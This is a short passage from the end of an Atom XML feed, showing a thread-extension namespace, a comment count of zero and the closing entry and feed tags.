xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry></feed>